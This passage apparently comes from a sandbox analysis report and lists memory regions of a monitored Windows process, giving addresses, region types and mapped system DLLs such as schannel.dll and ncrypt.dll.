0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1063 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1064 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1065 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1066 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1067 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1068 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1069 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1070 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1071 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1072 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1073 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1074 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1075 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1076 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1077 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1078 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1079 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1080 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1081 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1082 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1083 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1084 start_va = 0x3960000 end_va = 0x396ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003960000" filename = "" Region: id = 1085 start_va = 0x3960000 end_va = 0x3971fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003960000" filename = "" Region: id = 1086 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 1087 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1088 start_va = 0x6930000 end_va = 0x69effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1089 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1090 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1091 start_va = 0x4800000 end_va = 0x488ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1092 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1093 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1094 start_va = 0x7fef4f90000 end_va = 0x7fef4f97fff monitored = 0 entry_point = 0x7fef4f91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1095 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1096 start_va = 0x8090000 end_va = 0x82fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008090000" filename = "" Region: id = 1097 start_va = 0x3960000 end_va = 0x3960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003960000" filename = "" Region: id = 1098 start_va = 0x8090000 end_va = 0x8189fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008090000" filename = "" Region: id = 1099 start_va = 0x8280000 end_va = 0x82fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008280000" filename = "" Region: id = 1100 start_va = 0x3970000 end_va = 0x3970fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003970000" filename = "" Region: id = 1101 start_va = 0x7fefcdd0000 end_va = 0x7fefce26fff monitored = 0 entry_point = 0x7fefcdd5e38 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1102 start_va = 0x7fefd1c0000 end_va = 0x7fefd20ffff monitored = 0 entry_point = 0x7fefd1c11e0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1103 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1104 start_va = 0x7fefcc80000 end_va = 0x7fefcccbfff monitored = 0 entry_point = 0x7fefcc87950 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1105 start_va = 0x3a10000 end_va = 0x3a19fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1106 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1478 start_va = 0x8090000 end_va = 0x818ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008090000" filename = "" Region: id = 1479 start_va = 0x8300000 end_va = 0x84fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008300000" filename = "" Region: id = 1480 start_va = 0x8500000 end_va = 0x85fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1481 start_va = 0x8600000 end_va = 0x8701fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008600000" filename = "" Region: id = 1482 start_va = 0x8710000 end_va = 0x8814fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 1483 start_va = 0x8500000 end_va = 0x8606fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1484 start_va = 0x8610000 end_va = 0x8719fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008610000" filename = "" Region: id = 1485 start_va = 0x8500000 end_va = 0x860bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1486 start_va = 0x8610000 end_va = 0x871efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008610000" filename = "" Region: id = 1487 start_va = 0x8720000 end_va = 0x8830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008720000" filename = "" Region: id = 1488 start_va = 0x8500000 end_va = 0x8613fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1489 start_va = 0x8620000 end_va = 0x8735fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008620000" filename = "" Region: id = 1490 start_va = 0x8500000 end_va = 0x8618fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1491 start_va = 0x8620000 end_va = 0x873afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008620000" filename = "" Region: id = 1492 start_va = 0x8500000 end_va = 0x861dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1493 start_va = 0x8620000 end_va = 0x873ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008620000" filename = "" Region: id = 1494 start_va = 0x8740000 end_va = 0x8862fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 1495 start_va = 0x8500000 end_va = 0x8624fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1496 start_va = 0x8630000 end_va = 0x8757fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008630000" filename = "" Region: id = 1497 start_va = 0x8500000 end_va = 0x8629fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1498 start_va = 0x8630000 end_va = 0x875cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008630000" filename = "" Region: id = 1499 start_va = 0x8500000 end_va = 0x862efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1500 start_va = 0x8630000 end_va = 0x8761fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008630000" filename = "" Region: id = 1501 start_va = 0x8770000 end_va = 0x88a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008770000" filename = "" Region: id = 1502 start_va = 0x8500000 end_va = 0x8636fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1503 start_va = 0x8640000 end_va = 0x8778fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008640000" filename = "" Region: id = 1504 start_va = 0x8500000 end_va = 0x863bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1505 start_va = 0x8640000 end_va = 0x877dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008640000" filename = "" Region: id = 1506 start_va = 0x8780000 end_va = 0x88c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008780000" filename = "" Region: id = 1507 start_va = 0x8500000 end_va = 0x8642fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1508 start_va = 0x8650000 end_va = 0x8795fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008650000" filename = "" Region: id = 1509 start_va = 0x8500000 end_va = 0x8647fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1510 start_va = 0x8650000 end_va = 0x879afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008650000" filename = "" Region: id = 1511 start_va = 0x8500000 end_va = 0x864cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1512 start_va = 0x8650000 end_va = 0x879ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008650000" filename = "" Region: id = 1513 start_va = 0x87a0000 end_va = 0x88f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087a0000" filename = "" Region: id = 1514 start_va = 0x8500000 end_va = 0x8654fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1515 start_va = 0x8660000 end_va = 0x87b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008660000" filename = "" Region: id = 1516 start_va = 0x8500000 end_va = 0x8659fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1517 start_va = 0x8660000 end_va = 0x87bbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008660000" filename = "" Region: id = 1518 start_va = 0x8500000 end_va = 0x865efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1519 start_va = 0x8660000 end_va = 0x87c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008660000" filename = "" Region: id = 1520 start_va = 0x87d0000 end_va = 0x8933fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 1521 start_va = 0x8500000 end_va = 0x8665fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1522 start_va = 0x8670000 end_va = 0x87d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008670000" filename = "" Region: id = 1523 start_va = 0x8500000 end_va = 0x866afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1524 start_va = 0x8670000 end_va = 0x87ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008670000" filename = "" Region: id = 1525 start_va = 0x8500000 end_va = 0x866ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1526 start_va = 0x8670000 end_va = 0x87e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008670000" filename = "" Region: id = 1527 start_va = 0x87f0000 end_va = 0x8964fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 1528 start_va = 0x8500000 end_va = 0x8677fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1529 start_va = 0x8680000 end_va = 0x87f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008680000" filename = "" Region: id = 1530 start_va = 0x8500000 end_va = 0x867cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1531 start_va = 0x8680000 end_va = 0x87fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008680000" filename = "" Region: id = 1532 start_va = 0x8800000 end_va = 0x8981fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 1533 start_va = 0x8500000 end_va = 0x8683fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1534 start_va = 0x8690000 end_va = 0x8816fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 1535 start_va = 0x8500000 end_va = 0x8688fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1536 start_va = 0x8690000 end_va = 0x881bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 1537 start_va = 0x8500000 end_va = 0x868dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1538 start_va = 0x8690000 end_va = 0x8820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 1539 start_va = 0x8830000 end_va = 0x89c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008830000" filename = "" Region: id = 1540 start_va = 0x8500000 end_va = 0x8695fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1541 start_va = 0x86a0000 end_va = 0x8837fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086a0000" filename = "" Region: id = 1542 start_va = 0x8500000 end_va = 0x869afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1543 start_va = 0x86a0000 end_va = 0x883cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086a0000" filename = "" Region: id = 1544 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1545 start_va = 0x8500000 end_va = 0x869ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1546 start_va = 0x86a0000 end_va = 0x8841fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086a0000" filename = "" Region: id = 1547 start_va = 0x8850000 end_va = 0x89f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008850000" filename = "" Region: id = 1548 start_va = 0x8500000 end_va = 0x86a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1549 start_va = 0x86b0000 end_va = 0x8859fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086b0000" filename = "" Region: id = 1550 start_va = 0x8500000 end_va = 0x86abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1551 start_va = 0x86b0000 end_va = 0x885efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086b0000" filename = "" Region: id = 1552 start_va = 0x8860000 end_va = 0x8a10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008860000" filename = "" Region: id = 1553 start_va = 0x8500000 end_va = 0x86b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1554 start_va = 0x86c0000 end_va = 0x8875fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086c0000" filename = "" Region: id = 1555 start_va = 0x8500000 end_va = 0x86b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1556 start_va = 0x86c0000 end_va = 0x887afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086c0000" filename = "" Region: id = 1557 start_va = 0x8500000 end_va = 0x86bdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1558 start_va = 0x86c0000 end_va = 0x887ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086c0000" filename = "" Region: id = 1559 start_va = 0x8880000 end_va = 0x8a42fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008880000" filename = "" Region: id = 1560 start_va = 0x8500000 end_va = 0x86c4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1561 start_va = 0x86d0000 end_va = 0x8897fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086d0000" filename = "" Region: id = 1562 start_va = 0x3a20000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 1563 start_va = 0x3a20000 end_va = 0x3a31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 1564 start_va = 0x3b70000 end_va = 0x3b7dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b70000" filename = "" Region: id = 1565 start_va = 0x3a20000 end_va = 0x3a2dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a20000" filename = "" Region: id = 1566 start_va = 0x8500000 end_va = 0x86c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1567 start_va = 0x86d0000 end_va = 0x889cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086d0000" filename = "" Region: id = 1568 start_va = 0x8500000 end_va = 0x86cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1569 start_va = 0x86d0000 end_va = 0x88a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086d0000" filename = "" Region: id = 1570 start_va = 0x88b0000 end_va = 0x8a83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088b0000" filename = "" Region: id = 1571 start_va = 0x8500000 end_va = 0x86d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1572 start_va = 0x86e0000 end_va = 0x88b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086e0000" filename = "" Region: id = 1573 start_va = 0x8500000 end_va = 0x86dbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1574 start_va = 0x86e0000 end_va = 0x88bdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086e0000" filename = "" Region: id = 1575 start_va = 0x88c0000 end_va = 0x8aa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088c0000" filename = "" Region: id = 1576 start_va = 0x8500000 end_va = 0x86e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1577 start_va = 0x86f0000 end_va = 0x88d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086f0000" filename = "" Region: id = 1578 start_va = 0x8500000 end_va = 0x86e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1579 start_va = 0x86f0000 end_va = 0x88dafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086f0000" filename = "" Region: id = 1580 start_va = 0x8500000 end_va = 0x86ecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1581 start_va = 0x86f0000 end_va = 0x88dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086f0000" filename = "" Region: id = 1582 start_va = 0x88e0000 end_va = 0x8ad1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088e0000" filename = "" Region: id = 1583 start_va = 0x8500000 end_va = 0x86f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1584 start_va = 0x8700000 end_va = 0x88f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 1585 start_va = 0x8500000 end_va = 0x86f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1586 start_va = 0x8700000 end_va = 0x88fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 1587 start_va = 0x8500000 end_va = 0x86fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1588 start_va = 0x8700000 end_va = 0x8900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 1589 start_va = 0x8910000 end_va = 0x8b13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008910000" filename = "" Region: id = 1590 start_va = 0x8500000 end_va = 0x8705fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1591 start_va = 0x8710000 end_va = 0x8918fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 1592 start_va = 0x8500000 end_va = 0x870afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1593 start_va = 0x8710000 end_va = 0x891dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 1594 start_va = 0x8500000 end_va = 0x870ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1595 start_va = 0x8710000 end_va = 0x8922fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 1596 start_va = 0x8930000 end_va = 0x8b44fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008930000" filename = "" Region: id = 1597 start_va = 0x8500000 end_va = 0x8717fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1598 start_va = 0x8720000 end_va = 0x8939fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008720000" filename = "" Region: id = 1599 start_va = 0x8500000 end_va = 0x871cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1600 start_va = 0x8720000 end_va = 0x893efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008720000" filename = "" Region: id = 1601 start_va = 0x8940000 end_va = 0x8b61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008940000" filename = "" Region: id = 1602 start_va = 0x8500000 end_va = 0x8723fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1603 start_va = 0x8730000 end_va = 0x8956fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 1604 start_va = 0x8500000 end_va = 0x8728fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1605 start_va = 0x8730000 end_va = 0x895bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 1606 start_va = 0x8500000 end_va = 0x872dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1607 start_va = 0x8730000 end_va = 0x8960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 1608 start_va = 0x8970000 end_va = 0x8ba2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008970000" filename = "" Region: id = 1609 start_va = 0x8500000 end_va = 0x8735fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1610 start_va = 0x8740000 end_va = 0x8977fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 1611 start_va = 0x8500000 end_va = 0x873afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1612 start_va = 0x8740000 end_va = 0x897cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 1613 start_va = 0x8500000 end_va = 0x873ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1614 start_va = 0x8740000 end_va = 0x8981fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 1615 start_va = 0x8990000 end_va = 0x8bd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008990000" filename = "" Region: id = 1616 start_va = 0x8500000 end_va = 0x8746fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1617 start_va = 0x8750000 end_va = 0x8999fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008750000" filename = "" Region: id = 1618 start_va = 0x8500000 end_va = 0x874bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1619 start_va = 0x8750000 end_va = 0x899efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008750000" filename = "" Region: id = 1620 start_va = 0x89a0000 end_va = 0x8bf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089a0000" filename = "" Region: id = 1621 start_va = 0x8500000 end_va = 0x8753fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1622 start_va = 0x8760000 end_va = 0x89b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008760000" filename = "" Region: id = 1623 start_va = 0x8500000 end_va = 0x8758fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1624 start_va = 0x8760000 end_va = 0x89bafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008760000" filename = "" Region: id 